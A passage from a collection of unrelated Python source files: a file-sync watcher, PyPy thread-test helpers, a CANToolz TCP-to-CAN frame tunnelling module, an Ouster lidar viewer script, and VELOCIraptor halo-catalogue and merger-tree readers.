self._exchange = exchange
def stop(self):
self._stop_event.set()
def start(self):
def run():
while not self._stop_event.is_set():
try:
fs_event = self._queue.get(timeout=1)
except queue.Empty:
continue
if self._monitor.should_sync(fs_event):
try:
self._handle_sync(fs_event)
self._monitor.has_synced(fs_event)
except Exception as exc:
logging.exception(exc)
self._exchange.publish(
Messages.ERROR_HANDLING_FS_EVENT
)
self._thread = threading.Thread(target=run)
self._thread.start()
def _handle_sync(self, fs_event):
logging.info("Processing file system event {}".format(fs_event))
self._exchange.publish(Messages.STARTING_HANDLING_FS_EVENT, fs_event)
if fs_event.is_directory:
# TODO implement directory handling
if fs_event.event_type in {
ChangeEventType.CREATED,
ChangeEventType.MODIFIED,
}:
self._synchronizer.mkdir_remote(fs_event.path)
elif fs_event.event_type == ChangeEventType.DELETED:
self._synchronizer.rmdir_remote(fs_event.path)
elif fs_event.event_type == ChangeEventType.MOVED:
self._synchronizer.mvfile_remote(
fs_event.path, fs_event.extra_args["dest_path"]
)
else:
path = fs_event.path
if fs_event.event_type in {
ChangeEventType.CREATED,
ChangeEventType.MODIFIED,
}:
self._synchronizer.up(path)
elif fs_event.event_type == ChangeEventType.DELETED:
self._synchronizer.rmfile_remote(path)
elif fs_event.event_type == ChangeEventType.MOVED:
self._synchronizer.mvfile_remote(
path, fs_event.extra_args["dest_path"]
)
self._exchange.publish(Messages.FINISHED_HANDLING_FS_EVENT, fs_event)
def join(self):
if self._thread is not None:
self._thread.join()
class HeldFilesMonitor(object):
def __init__(self, synchronizer, sftp, exchange):
self._synchronizer = synchronizer
self._local_dir = synchronizer.local_dir
self._remote_dir = synchronizer.remote_dir
self._sftp = sftp
self._exchange = exchange
_local_tree = self._synchronizer.list_local()
_remote_tree = self._synchronizer.list_remote()
self._local_timestamps = TimestampDatabase.from_fs_objects(_local_tree)
self._remote_timestamps = TimestampDatabase.from_fs_objects(
_remote_tree
)
self._held_paths = set(
self._get_initial_help_paths(_local_tree, _remote_tree)
)
self._exchange.publish(
Messages.HELD_FILES_CHANGED, frozenset(self._held_paths)
)
def _get_initial_help_paths(self, local_tree, remote_tree):
for difference in compare_file_trees(local_tree, remote_tree):
if difference[0] in {"RIGHT_ONLY", "TYPE_DIFFERENT"}:
yield difference[1].path
elif difference[0] == "ATTRS_DIFFERENT":
local_mtime = difference[1].attrs.last_modified
remote_mtime = difference[2].attrs.last_modified
if remote_mtime > local_mtime:
# Hold only if remote file was modified after current
yield difference[1].path
def should_sync(self, fs_event):
path = fs_event.path
if path in self._held_paths:
return False
else:
if fs_event.event_type == ChangeEventType.MOVED:
dest_path = fs_event.extra_args["dest_path"]
if self._has_path_changed(path):
self._add_to_held_paths(path)
src_path_unchanged = False
else:
src_path_unchanged = True
if self._has_path_changed(dest_path):
self._add_to_held_paths(dest_path)
dest_path_unchanged = False
else:
dest_path_unchanged = True
return src_path_unchanged and dest_path_unchanged
else:
if self._has_path_changed(path):
self._add_to_held_paths(path)
return False
else:
return True
def _has_path_changed(self, path):
last_known_timestamp = self._remote_timestamps.get(path)
try:
current_timestamp = get_remote_mtime(
os.path.join(self._remote_dir, path), self._sftp
)
has_changed = last_known_timestamp != current_timestamp
return has_changed
except FileNotFoundError:
return False
def _add_to_held_paths(self, path):
self._held_paths.add(path)
self._exchange.publish(
Messages.HELD_FILES_CHANGED, frozenset(self._held_paths)
)
def has_synced(self, fs_event):
if fs_event.event_type == ChangeEventType.DELETED:
self._remote_timestamps.remove(fs_event.path)
elif fs_event.event_type == ChangeEventType.MOVED:
self._remote_timestamps.remove(fs_event.path)
dest_path = fs_event.extra_args["dest_path"]
abs_dest_path = os.path.join(self._remote_dir, dest_path)
current_timestamp = get_remote_mtime(abs_dest_path, self._sftp)
self._remote_timestamps.update_if_newer(
dest_path, current_timestamp
)
else:
path = fs_event.path
current_timestamp = get_remote_mtime(
os.path.join(self._remote_dir, path), self._sftp
)
self._remote_timestamps.update_if_newer(path, current_timestamp)
class WatcherSynchronizer(object):
def __init__(self, sftp, synchronizer, exchange):
local_dir = synchronizer.local_dir
self.queue = ListableQueue()
self.observer = watchdog.observers.Observer()
self._exchange = exchange
monitor = HeldFilesMonitor(synchronizer, sftp, exchange)
self.observer.schedule(
FileSystemChangeHandler(
self.queue, local_dir, synchronizer.ignore_paths
),
local_dir,
recursive=True,
)
self.uploader = Uploader(self.queue, synchronizer, monitor, exchange)
def start(self):
self._exchange.publish(Messages.START_WATCH_SYNC_MAIN_LOOP)
self.observer.start()
self.uploader.start()
def stop(self):
self.observer.stop()
self.uploader.stop()
def join(self):
self.observer.join()
self.uploader.join()
|
support.py
|
import gc
import time
import thread
import os
import errno
from pypy.interpreter.gateway import interp2app, unwrap_spec
from pypy.module.thread import gil
NORMAL_TIMEOUT = 300.0 # 5 minutes
def waitfor(space, w_condition, delay=1):
adaptivedelay = 0.04
limit = time.time() + delay * NORMAL_TIMEOUT
while time.time() <= limit:
gil.before_external_call()
time.sleep(adaptivedelay)
gil.after_external_call()
gc.collect()
if space.is_true(space.call_function(w_condition)):
return
adaptivedelay *= 1.05
print '*** timed out ***'
def timeout_killer(cls, pid, delay):
def kill():
for x in range(delay * 10):
time.sleep(0.1)
try:
os.kill(pid, 0)
except OSError as e:
if e.errno == errno.ESRCH: # no such process
return
raise
os.kill(pid, 9)
print("process %s killed!" % (pid,))
import threading
threading.Thread(target=kill).start()
class GenericTestThread:
spaceconfig = dict(usemodules=('thread', 'time', 'signal'))
def setup_class(cls):
cls.w_runappdirect = cls.space.wrap(cls.runappdirect)
if cls.runappdirect:
cls.w_NORMAL_TIMEOUT = NORMAL_TIMEOUT
def plain_waitfor(cls, condition, delay=1):
import gc
import time
adaptivedelay = 0.04
limit = time.time() + cls.NORMAL_TIMEOUT * delay
while time.time() <= limit:
time.sleep(adaptivedelay)
gc.collect()
if condition():
return
adaptivedelay *= 1.05
print('*** timed out ***')
cls.w_waitfor = plain_waitfor
cls.w_timeout_killer = timeout_killer
else:
@unwrap_spec(delay=int)
def py_waitfor(space, w_condition, delay=1):
waitfor(space, w_condition, delay)
cls.w_waitfor = cls.space.wrap(interp2app(py_waitfor))
def py_timeout_killer(space, __args__):
args_w, kwargs_w = __args__.unpack()
args = map(space.unwrap, args_w)
kwargs = dict([
(k, space.unwrap(v))
for k, v in kwargs_w.iteritems()
])
timeout_killer(cls, *args, **kwargs)
cls.w_timeout_killer = cls.space.wrap(interp2app(py_timeout_killer))
cls.w_busywait = cls.space.appexec([], """():
import time
return time.sleep
""")
|
hw_TCP2CAN.py
|
import time
import struct
import socket
import threading
import traceback
import socketserver
from cantoolz.can import CANMessage
from cantoolz.module import CANModule, Command
class CustomTCPClient:
def __init__(self, conn):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.settimeout(5.0)
self.socket.connect(conn)
self._thread = threading.Thread(target=self.handle)
self._thread.daemon = True
self._thread.start()
self.CANList_in = []
self.CANList_out = []
self._access_in = threading.Event()
self._access_out = threading.Event()
def handle(self):
while True:
try:
self.socket.sendall(b'c\x01\x00\x00') # Request for frames
inc_header = self.socket.recv(4) # Get header first
if inc_header[0:2] != b'c\x02':
self.selfx.dprint(0, "HEADER ERROR")
self.selfx.set_error_text('HEADER ERROR')
continue
else:
ready = struct.unpack("!H", inc_header[2:4])[0]
inc_size = 16 * ready
if ready > 0:
inc_data = self.socket.recv(inc_size) # Get frames
idx = 0
while ready != 0:
packet = inc_data[idx:idx + 16]
if packet[0:3] != b'ct\x03':
self.selfx.dprint(0, 'CLIENT GOT INCORRECT DATA')
self.selfx.set_error_text('CLIENT GOT INCORRECT DATA')
break
else:
fid = struct.unpack("!I", packet[3:7])[0]
flen = packet[7]
fdata = packet[8:16]
while self._access_in.is_set():
time.sleep(0.0001)
self._access_in.set()
self.CANList_in.append(
CANMessage.init_data(int(fid), flen, fdata)
)
self._access_in.clear()
idx += 16
ready -= 1
while self._access_out.is_set():
time.sleep(0.0001)
self._access_out.set()
ready = len(self.CANList_out)
if ready > 0:
sz = struct.pack("!H", ready)
send_msg = b'c\x04' + sz
self.socket.sendall(send_msg)
send_msg = b''
for can_msg in self.CANList_out:
# 16 byte
send_msg += b'ct\x05' + (b'\x00' * (4 - len(can_msg.frame_raw_id))) + can_msg.frame_raw_id + can_msg.frame_raw_length + can_msg.frame_raw_data + (b'\x00' * (8 - can_msg.frame_length))
if ready > 0:
self.socket.sendall(send_msg)
self.CANList_out = []
self._access_out.clear()
except Exception as e:
self.selfx.set_error_text('TCPClient: recv response error:' + str(e))
traceback.print_exc()
def write_can(self, can_frame):
while self._access_out.is_set():
time.sleep(0.0001)
self._access_out.set()
self.CANList_out.append(can_frame)
self._access_out.clear()
def read_can(self):
if len(self.CANList_in) > 0:
while self._access_in.is_set():
time.sleep(0.0001)
self._access_in.set()
msg = self.CANList_in.pop(0)
self._access_in.clear()
return msg
else:
return None
def close(self):
self._thread._stop()
self.socket.close()
class CustomTCPServer(socketserver.TCPServer):
def __init__(self, server_address, RequestHandlerClass):
super().__init__(server_address, RequestHandlerClass)
self.CANList_in = []
self.CANList_out = []
self._access_in = threading.Event()
self._access_out = threading.Event()
self.socket.settimeout(5.0)
self.prt = ""
def write_can(self, can_frame):
while self._access_out.is_set():
time.sleep(0.0001)
self._access_out.set()
self.CANList_out.append(can_frame)
self._access_out.clear()
def read_can(self):
if len(self.CANList_in) > 0:
while self._access_in.is_set():
time.sleep(0.0001)
self._access_in.set()
msg = self.CANList_in.pop(0)
self._access_in.clear()
return msg
else:
return None
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
# self.request is the TCP socket connected to the client
print("TCP2CAN connected to " + str(self.server.prt))
self.server.selfx.set_error_text("TCP2CAN connected to " + str(self.server.prt))
self.server._access_in.clear()
self.server._access_out.clear()
while True:
# Get header first
data = self.request.recv(4)
if data[0:1] == b'c':
# Header
if data[1] == 1: # Request for frames
while self.server._access_out.is_set():
time.sleep(0.0001)
self.server._access_out.set()
ready = len(self.server.CANList_out)
sz = struct.pack("!H", ready)
send_msg = b'c\x02' + sz
self.request.sendall(send_msg)
send_msg = b''
for can_msg in self.server.CANList_out:
# 16 byte
send_msg += b'ct\x03' + (b'\x00' * (4 - len(can_msg.frame_raw_id))) + can_msg.frame_raw_id + can_msg.frame_raw_length + can_msg.frame_raw_data + (b'\x00' * (8 - can_msg.frame_length))
if ready > 0:
self.request.sendall(send_msg)
self.server.CANList_out = []
self.server._access_out.clear()
elif data[1] == 4: # Incoming frames...
ready = struct.unpack("!H", data[2:4])[0]
inc_size = 16 * ready
if ready > 0:
inc_data = self.request.recv(inc_size)
idx = 0
while ready != 0:
packet = inc_data[idx:idx + 16]
if packet[0:3] != b'ct\x05':
print('SERVER GOT INCORRECT DATA')
self.server.selfx.set_error_text('SERVER GOT INCORRECT DATA')
break
else:
fid = struct.unpack("!I", packet[3:7])[0]
flen = packet[7]
fdata = packet[8:16]
while self.server._access_in.is_set():
time.sleep(0.0001)
self.server._access_in.set()
self.server.CANList_in.append(
CANMessage.init_data(int(fid), flen, fdata)
)
self.server._access_in.clear()
idx += 16
ready -= 1
class hw_TCP2CAN(CANModule):
name = "TCP interface"
help = """
This module works as TCP client/server for tunneling CAN Frames
Init parameters example:
mode - 'client' or 'server'
port - <int> - TCP prt to listen or to connect (depends on mode)
address - 'ip.ip.ip.ip' - IP address of the server
Example: {'mode':'server','port':2001,'address':''}
Module parameters:
action - read or write. Will write/read to/from TCP
pipe - integer, 1 or 2 - from which pipe to read or write
If you use both buses(and different), than you need only one pipe configured...
Example: {'action':'read','pipe':2}
"""
def get_status(self):
return "Current status: IN: " + str(len(self.server.CANList_in)) + str(self.server._access_in.is_set()) + " OUT: " + str(len(self.server.CANList_out)) + str(self.server._access_out.is_set())
def do_start_x(self):
if self.server is None:
self.dprint(2, 'Started mode as ' + str(self.mode))
self.set_error_text('Started mode as ' + str(self.mode))
if self.mode == 'server':
self.server = CustomTCPServer((self.HOST, self.PORT), ThreadedTCPRequestHandler)
self.server.prt = self.PORT
self._thread = threading.Thread(target=self.server.serve_forever)
self._thread.daemon = True
self._thread.start()
else:
self.server = CustomTCPClient((self.HOST, self.PORT))
self.server.selfx = self
def do_stop_x(self): # disable reading
if self.server is not None:
self.dprint(2, 'Stoped mode as ' + str(self.mode))
self.set_error_text('Stoped mode as ' + str(self.mode))
if self.mode == 'server':
self.server.server_close()
self.server.shutdown()
self._thread._stop()
print("DONE")
else:
self.server.close()
self.server = None
def do_init(self, params): # Get device and open serial port
self.commands['t'] = Command("Send direct command to the device, like 13:8:1122334455667788", 1, " <cmd> ", self.dev_write, True)
self.mode = params.get('mode', None)
self.server = None
if not self.mode or self.mode not in ['server', 'client']:
self.dprint(0, 'Can\'t get mode!')
exit()
self.HOST = params.get('address', 'localhost')
self.PORT = int(params.get('port', 6550))
self._bus = "TCP_" + self.mode + "_" + str(self.PORT)
self.do_start_x()
return 1
def dev_write(self, line):
self.dprint(0, "CMD: " + line)
fid = line.split(":")[0]
length = line.split(":")[1]
data = line.split(":")[2]
self.server.write_can(CANMessage.init_data(int(fid), int(length), bytes.fromhex(data)[:int(length)]))
return "Sent!"
def do_effect(self, can_msg, args): # read full packet from serial port
if args.get('action') == 'read':
can_msg = self.do_read(can_msg)
elif args.get('action') == 'write':
self.do_write(can_msg)
else:
self.dprint(1, 'Command ' + args['action'] + ' not implemented 8(')
self.set_error_text('Command ' + args['action'] + ' not implemented 8(')
return can_msg
def do_write(self, can_msg):
if can_msg.CANData:
self.server.write_can(can_msg.CANFrame)
return can_msg
def do_read(self, can_msg):
if not can_msg.CANData:
can_frame = self.server.read_can()
if can_frame:
can_msg.CANData = True
can_msg.CANFrame = can_frame
can_msg.bus = self._bus
return can_msg
|
viz.py
|
import argparse
import os
import threading
import ouster.client as client
from ouster.sdk._viz import PyViz
def main() -> None:
descr = """Visualize pcap or sensor data using simple viz bindings."""
epilog = """When reading data from a sensor, this will currently not
configure the sensor or query it for the port to listen on. You will need to
set the sensor port and distination settings separately.
"""
parser = argparse.ArgumentParser(
description=descr, epilog=epilog)
required = parser.add_argument_group('one of the following is required')
group = required.add_mutually_exclusive_group(required=True)
group.add_argument('--sensor', metavar='HOST', help='sensor hostname')
group.add_argument('--pcap', metavar='PATH', help='path to pcap file')
parser.add_argument('--meta', metavar='PATH', help='path to metadata json')
parser.add_argument('--lidar-port', type=int, default=7502)
args = parser.parse_args()
if args.sensor:
print("Initializing...")
scans = client.Scans.stream(args.sensor,
args.lidar_port,
complete=False)
elif args.pcap:
import ouster.pcap as pcap
if args.meta:
metadata_path = args.meta
else:
print("Deducing metadata based on pcap name. "
"To provide a different metadata path, use --meta")
metadata_path = os.path.splitext(args.pcap)[0] + ".json"
with open(metadata_path) as json:
info = client.SensorInfo(json.read())
scans = client.Scans(
pcap.Pcap(args.pcap, info, rate=1.0, lidar_port=args.lidar_port))
viz = PyViz(scans.metadata)
def run() -> None:
try:
for scan in scans:
viz.draw(scan)
finally:
# signal main thread to exit
viz.quit()
try:
print("Starting client thread...")
client_thread = threading.Thread(target=run, name="Client")
client_thread.start()
print("Starting rendering loop...")
viz.loop()
finally:
scans.close()
client_thread.join()
print("Done")
if __name__ == "__main__":
main()
|
velociraptor_python_tools.py
|
#Make backwards compatible with python 2, ignored in python 3
from __future__ import print_function
import sys,os,os.path,string,time,re,struct
import math,operator
import numpy as np
import h5py #import hdf5 interface
import tables as pytb #import pytables
import pandas as pd
from copy import deepcopy
from collections import deque
import itertools
import scipy.interpolate as scipyinterp
import scipy.spatial as spatial
import multiprocessing as mp
from collections import deque
import cython
from cython.parallel import prange, parallel
#would be good to compile these routines with cython
#try to speed up search
#cimport numpy as np
"""
Routines for reading velociraptor output
"""
"""
IO Routines
"""
def ReadPropertyFile(basefilename,ibinary=0,iseparatesubfiles=0,iverbose=0, desiredfields=[], isiminfo=True, iunitinfo=True):
"""
VELOCIraptor/STF files in various formats
for example ascii format contains
a header with
filenumber number_of_files
numhalos_in_file nnumhalos_in_total
followed by a header listing the information contain. An example would be
ID(1) ID_mbp(2) hostHaloID(3) numSubStruct(4) npart(5) Mvir(6) Xc(7) Yc(8) Zc(9) Xcmbp(10) Ycmbp(11) Zcmbp(12) VXc(13) VYc(14) VZc(15) VXcmbp(16) VYcmbp(17) VZcmbp(18) Mass_tot(19) Mass_FOF(20) Mass_200mean(21) Mass_200crit(22) Mass_BN97(23) Efrac(24) Rvir(25) R_size(26) R_200mean(27) R_200crit(28) R_BN97(29) R_HalfMass(30) Rmax(31) Vmax(32) sigV(33) veldisp_xx(34) veldisp_xy(35) veldisp_xz(36) veldisp_yx(37) veldisp_yy(38) veldisp_yz(39) veldisp_zx(40) veldisp_zy(41) veldisp_zz(42) lambda_B(43) Lx(44) Ly(45) Lz(46) q(47) s(48) eig_xx(49) eig_xy(50) eig_xz(51) eig_yx(52) eig_yy(53) eig_yz(54) eig_zx(55) eig_zy(56) eig_zz(57) cNFW(58) Krot(59) Ekin(60) Epot(61) n_gas(62) M_gas(63) Xc_gas(64) Yc_gas(65) Zc_gas(66) VXc_gas(67) VYc_gas(68) VZc_gas(69) Efrac_gas(70) R_HalfMass_gas(71) veldisp_xx_gas(72) veldisp_xy_gas(73) veldisp_xz_gas(74) veldisp_yx_gas(75) veldisp_yy_gas(76) veldisp_yz_gas(77) veldisp_zx_gas(78) veldisp_zy_gas(79) veldisp_zz_gas(80) Lx_gas(81) Ly_gas(82) Lz_gas(83) q_gas(84) s_gas(85) eig_xx_gas(86) eig_xy_gas(87) eig_xz_gas(88) eig_yx_gas(89) eig_yy_gas(90) eig_yz_gas(91) eig_zx_gas(92) eig_zy_gas(93) eig_zz_gas(94) Krot_gas(95) T_gas(96) Zmet_gas(97) SFR_gas(98) n_star(99) M_star(100) Xc_star(101) Yc_star(102) Zc_star(103) VXc_star(104) VYc_star(105) VZc_star(106) Efrac_star(107) R_HalfMass_star(108) veldisp_xx_star(109) veldisp_xy_star(110) veldisp_xz_star(111) veldisp_yx_star(112) veldisp_yy_star(113) veldisp_yz_star(114) veldisp_zx_star(115) veldisp_zy_star(116) veldisp_zz_star(117) Lx_star(118) Ly_star(119) Lz_star(120) q_star(121) s_star(122) eig_xx_star(123) eig_xy_star(124) eig_xz_star(125) eig_yx_star(126) eig_yy_star(127) eig_yz_star(128) eig_zx_star(129) eig_zy_star(130) eig_zz_star(131) Krot_star(132) tage_star(133) Zmet_star(134)
then followed by data
Note that a file will indicate how many files the total output has been split into
Not all fields need be read in. If only want specific fields, can pass a string of desired fields like
['ID', 'Mass_FOF', 'Krot']
#todo still need checks to see if fields not present and if so, not to include them or handle the error
"""
#this variable is the size of the char array in binary formated data that stores the field names
CHARSIZE=40
start = time.clock()
inompi=True
if (iverbose): print("reading properties file",basefilename)
filename=basefilename+".properties"
#load header
if (os.path.isfile(filename)==True):
numfiles=0
else:
filename=basefilename+".properties"+".0"
inompi=False
if (os.path.isfile(filename)==False):
print("file not found")
return []
byteoffset=0
#used to store fields, their type, etc
fieldnames=[]
fieldtype=[]
fieldindex=[]
if (ibinary==0):
#load ascii file
halofile = open(filename, 'r')
#read header information
[filenum,numfiles]=halofile.readline().split()
filenum=int(filenum);numfiles=int(numfiles)
[numhalos, numtothalos]= halofile.readline().split()
numhalos=np.uint64(numhalos);numtothalos=np.uint64(numtothalos)
names = ((halofile.readline())).split()
#remove the brackets in ascii file names
fieldnames= [fieldname.split("(")[0] for fieldname in names]
for i in np.arange(fieldnames.__len__()):
fieldname=fieldnames[i]
if fieldname in ["ID","numSubStruct","npart","n_gas","n_star", "Structuretype"]:
fieldtype.append(np.uint64)
elif fieldname in ["ID_mbp", "hostHaloID"]:
fieldtype.append(np.int64)
else:
fieldtype.append(np.float64)
halofile.close()
#if desiredfields is NULL load all fields
#but if this is passed load only those fields
if (len(desiredfields)>0):
lend=len(desiredfields)
fieldindex=np.zeros(lend,dtype=int)
desiredfieldtype=[[] for i in range(lend)]
for i in range(lend):
fieldindex[i]=fieldnames.index(desiredfields[i])
desiredfieldtype[i]=fieldtype[fieldindex[i]]
fieldtype=desiredfieldtype
fieldnames=desiredfields
#to store the string containing data format
fieldtypestring=''
for i in np.arange(fieldnames.__len__()):
if fieldtype[i]==np.uint64: fieldtypestring+='u8,'
elif fieldtype[i]==np.int64: fieldtypestring+='i8,'
elif fieldtype[i]==np.float64: fieldtypestring+='f8,'
elif (ibinary==1):
#load binary file
halofile = open(filename, 'rb')
[filenum,numfiles]=np.fromfile(halofile,dtype=np.int32,count=2)
[numhalos,numtothalos]=np.fromfile(halofile,dtype=np.uint64,count=2)
headersize=np.fromfile(halofile,dtype=np.int32,count=1)[0]
byteoffset=np.dtype(np.int32).itemsize*3+np.dtype(np.uint64).itemsize*2+4*headersize
for i in range(headersize):
fieldnames.append(unpack('s', halofile.read(CHARSIZE)).strip())
for i in np.arange(fieldnames.__len__()):
fieldname=fieldnames[i]
if fieldname in ["ID","numSubStruct","npart","n_gas","n_star", "Structuretype"]:
fieldtype.append(np.uint64)
elif fieldname in ["ID_mbp", "hostHaloID"]:
fieldtype.append(np.int64)
else:
fieldtype.append(np.float64)
halofile.close()
#if desiredfields is NULL load all fields
#but if this is passed load only those fields
if (len(desiredfields)>0):
lend=len(desiredfields)
fieldindex=np.zeros(lend,dtype=int)
desiredfieldtype=[[] for i in range(lend)]
for i in range(lend):
fieldindex[i]=fieldnames.index(desiredfields[i])
desiredfieldtype[i]=fieldtype[fieldindex[i]]
fieldtype=desiredfieldtype
fieldnames=desiredfields
#to store the string containing data format
fieldtypestring=''
for i in np.arange(fieldnames.__len__()):
if fieldtype[i]==np.uint64: fieldtypestring+='u8,'
elif fieldtype[i]==np.int64: fieldtypestring+='i8,'
elif fieldtype[i]==np.float64: fieldtypestring+='f8,'
elif (ibinary==2):
#load hdf file
halofile = h5py.File(filename, 'r')
filenum=int(halofile["File_id"][0])
numfiles=int(halofile["Num_of_files"][0])
numhalos=np.uint64(halofile["Num_of_groups"][0])
numtothalos=np.uint64(halofile["Total_num_of_groups"][0])
#atime=np.float(halofile.attrs["Time"])
fieldnames=[str(n) for n in halofile.keys()]
#clean of header info
fieldnames.remove("File_id")
fieldnames.remove("Num_of_files")
fieldnames.remove("Num_of_groups")
fieldnames.remove("Total_num_of_groups")
fieldtype=[halofile[fieldname].dtype for fieldname in fieldnames]
#if the desiredfields argument is passed only these fieds are loaded
if (len(desiredfields)>0):
if (iverbose):print("Loading subset of all fields in property file ", len(desiredfields), " instead of ", len(fieldnames))
fieldnames=desiredfields
fieldtype=[halofile[fieldname].dtype for fieldname in fieldnames]
halofile.close()
#allocate memory that will store the halo dictionary
catalog={fieldnames[i]:np.zeros(numtothalos,dtype=fieldtype[i]) for i in range(len(fieldnames))}
noffset=np.uint64(0)
for ifile in range(numfiles):
if (inompi==True): filename=basefilename+".properties"
else: filename=basefilename+".properties"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
if (ibinary==0):
halofile = open(filename, 'r')
halofile.readline()
numhalos=np.uint64(halofile.readline().split()[0])
halofile.close()
if (numhalos>0):htemp = np.loadtxt(filename,skiprows=3, usecols=fieldindex, dtype=fieldtypestring, unpack=True, ndmin=1)
elif(ibinary==1):
halofile = open(filename, 'rb')
np.fromfile(halofile,dtype=np.int32,count=2)
numhalos=np.fromfile(halofile,dtype=np.uint64,count=2)[0]
#halofile.seek(byteoffset);
if (numhalos>0):htemp=np.fromfile(halofile, usecols=fieldindex, dtype=fieldtypestring, unpack=True)
halofile.close()
elif(ibinary==2):
#here convert the hdf information into a numpy array
halofile = h5py.File(filename, 'r')
numhalos=np.uint64(halofile["Num_of_groups"][0])
if (numhalos>0):htemp=[np.array(halofile[catvalue]) for catvalue in fieldnames]
halofile.close()
#numhalos=len(htemp[0])
for i in range(len(fieldnames)):
catvalue=fieldnames[i]
if (numhalos>0): catalog[catvalue][noffset:noffset+numhalos]=htemp[i]
noffset+=numhalos
#if subhalos are written in separate files, then read them too
if (iseparatesubfiles==1):
for ifile in range(numfiles):
if (inompi==True): filename=basefilename+".sublevels"+".properties"
else: filename=basefilename+".sublevels"+".properties"+"."+str(ifile)
if (iverbose) : print("reading ",filename)
if (ibinary==0):
halofile = open(filename, 'r')
halofile.readline()
numhalos=np.uint64(halofile.readline().split()[0])
halofile.close()
if (numhalos>0):htemp = np.loadtxt(filename,skiprows=3, usecols=fieldindex, dtype=fieldtypestring, unpack=True, ndmin=1)
elif(ibinary==1):
halofile = open(filename, 'rb')
#halofile.seek(byteoffset);
np.fromfile(halofile,dtype=np.int32,count=2)
numhalos=np.fromfile(halofile,dtype=np.uint64,count=2)[0]
if (numhalos>0):htemp=np.fromfile(halofile, usecols=fieldindex, dtype=fieldtypestring, unpack=True)
halofile.close()
elif(ibinary==2):
halofile = h5py.File(filename, 'r')
numhalos=np.uint64(halofile["Num_of_groups"][0])
if (numhalos>0):htemp=[np.array(halofile[catvalue]) for catvalue in fieldnames]
halofile.close()
#numhalos=len(htemp[0])
for i in range(len(fieldnames)):
catvalue=fieldnames[i]
if (numhalos>0): catalog[catvalue][noffset:noffset+numhalos]=htemp[i]
noffset+=numhalos
#load associated simulation info, time and units
if (isiminfo):
siminfoname=basefilename+".siminfo"
siminfo=open(siminfoname,'r')
catalog['SimulationInfo']=dict()
for l in siminfo:
d=l.strip().split(' : ')
catalog['SimulationInfo'][d[0]]=float(d[1])
siminfo.close()
if (iunitinfo):
unitinfoname=basefilename+".units"
unitinfo=open(unitinfoname,'r')
catalog['UnitInfo']=dict()
for l in unitinfo:
d=l.strip().split(' : ')
catalog['UnitInfo'][d[0]]=float(d[1])
unitinfo.close()
if (iverbose): print("done reading properties file ",time.clock()-start)
return catalog,numtothalos
def ReadPropertyFileMultiWrapper(basefilename,index,halodata,numhalos,atime,ibinary=0,iseparatesubfiles=0,iverbose=0,desiredfields=[]):
"""
Wrapper for multithreaded reading
"""
#call read routine and store the data
halodata[index],numhalos[index]=ReadPropertyFile(basefilename,ibinary,iseparatesubfiles,iverbose,desiredfields)
def ReadPropertyFileMultiWrapperNamespace(index,basefilename,ns,ibinary=0,iseparatesubfiles=0,iverbose=0,desiredfields=[]):
#call read routine and store the data
ns.hdata[index],ns.ndata[index]=ReadPropertyFile(basefilename,ibinary,iseparatesubfiles,iverbose,desiredfields)
def ReadHaloMergerTree(treefilename,ibinary=0,iverbose=0,imerit=False,inpart=False):
"""
VELOCIraptor/STF merger tree in ascii format contains
a header with
number_of_snapshots
a description of how the tree was built
total number of halos across all snapshots
then followed by data
for each snapshot
snapshotvalue numhalos
haloid_1 numprogen_1
progenid_1
progenid_2
...
progenid_numprogen_1
haloid_2 numprogen_2
.
.
.
one can also have an output format that has an additional field for each progenitor, the meritvalue
"""
start = time.clock()
tree=[]
if (iverbose): print("reading Tree file",treefilename,os.path.isfile(treefilename))
if (os.path.isfile(treefilename)==False):
print("Error, file not found")
return tree
#if ascii format
if (ibinary==0):
treefile = open(treefilename, 'r')
numsnap=int(treefile.readline())
treefile.close()
elif(ibinary==2):
snaptreelist=open(treefilename,'r')
numsnap = sum(1 for line in snaptreelist)
snaptreelist.close()
else:
print("Unknown format, returning null")
numsnap=0
return tree
tree=[{"haloID": [], "Num_progen": [], "Progen": []} for i in range(numsnap)]
if (imerit):
for i in range(numsnap):
tree[i]['Merit']=[]
if (inpart):
for i in range(numsnap):
tree[i]['Npart']=[]
tree[i]['Npart_progen']=[]
#if ascii format
if (ibinary==0):
treefile = open(treefilename, 'r')
numsnap=int(treefile.readline())
descrip=treefile.readline().strip()
tothalos=int(treefile.readline())
offset=0
totalnumprogen=0
for i in range(numsnap):
[snapval,numhalos]=treefile.readline().strip().split('\t')
snapval=int(snapval);numhalos=int(numhalos)
#if really verbose
if (iverbose==2): print(snapval,numhalos)
tree[i]["haloID"]=np.zeros(numhalos, dtype=np.int64)
tree[i]["Num_progen"]=np.zeros(numhalos, dtype=np.uint32)
tree[i]["Progen"]=[[] for j in range(numhalos)]
if (imerit): tree[i]["Merit"]=[[] for j in range(numhalos)]
if (inpart):
tree[i]["Npart"]=np.zeros(numhalos, dtype=np.uint32)
tree[i]["Npart_progen"]=[[] for j in range(numhalos)]
for j in range(numhalos):
data=treefile.readline().strip().split('\t')
hid=np.int64(data[0]);nprog=np.uint32(data[1])
tree[i]["haloID"][j]=hid
tree[i]["Num_progen"][j]=nprog
if (inpart):tree[i]["Npart"][j]=np.uint32(data[2])
totalnumprogen+=nprog
if (nprog>0):
tree[i]["Progen"][j]=np.zeros(nprog,dtype=np.int64)
if (imerit): tree[i]["Merit"][j]=np.zeros(nprog,dtype=np.float32)
if (inpart): tree[i]["Npart_progen"][j]=np.zeros(nprog,dtype=np.uint32)
for k in range(nprog):
data=treefile.readline().strip().split(' ')
tree[i]["Progen"][j][k]=np.int64(data[0])
if (imerit):tree[i]["Merit"][j][k]=np.float32(data[1])
if (inpart):tree[i]["Npart_progen"][j][k]=np.uint32(data[2])
elif(ibinary==2):
snaptreelist=open(treefilename,'r')
#read the first file, get number of snaps from hdf file
snaptreename = snaptreelist.readline().strip()+".tree"
treedata=h5py.File(snaptreename,"r")
numsnaps=treedata.attrs['Number_of_snapshots']
treedata.close()
snaptreelist.close()
snaptreelist=open(treefilename,'r')
for snap in range(numsnaps):
snaptreename = snaptreelist.readline().strip()+".tree"
if (iverbose): print("Reading",snaptreename)
treedata = h5py.File(snaptreename,"r")
tree[snap]["haloID"] = np.asarray(treedata["ID"])
tree[snap]["Num_progen"] = np.asarray(treedata["NumProgen"])
if(inpart):tree[snap]["Npart"] = np.asarray(treedata["Npart"])
#See if the dataset exits
if("ProgenOffsets" in treedata.keys()):
#Find the indices to split the array
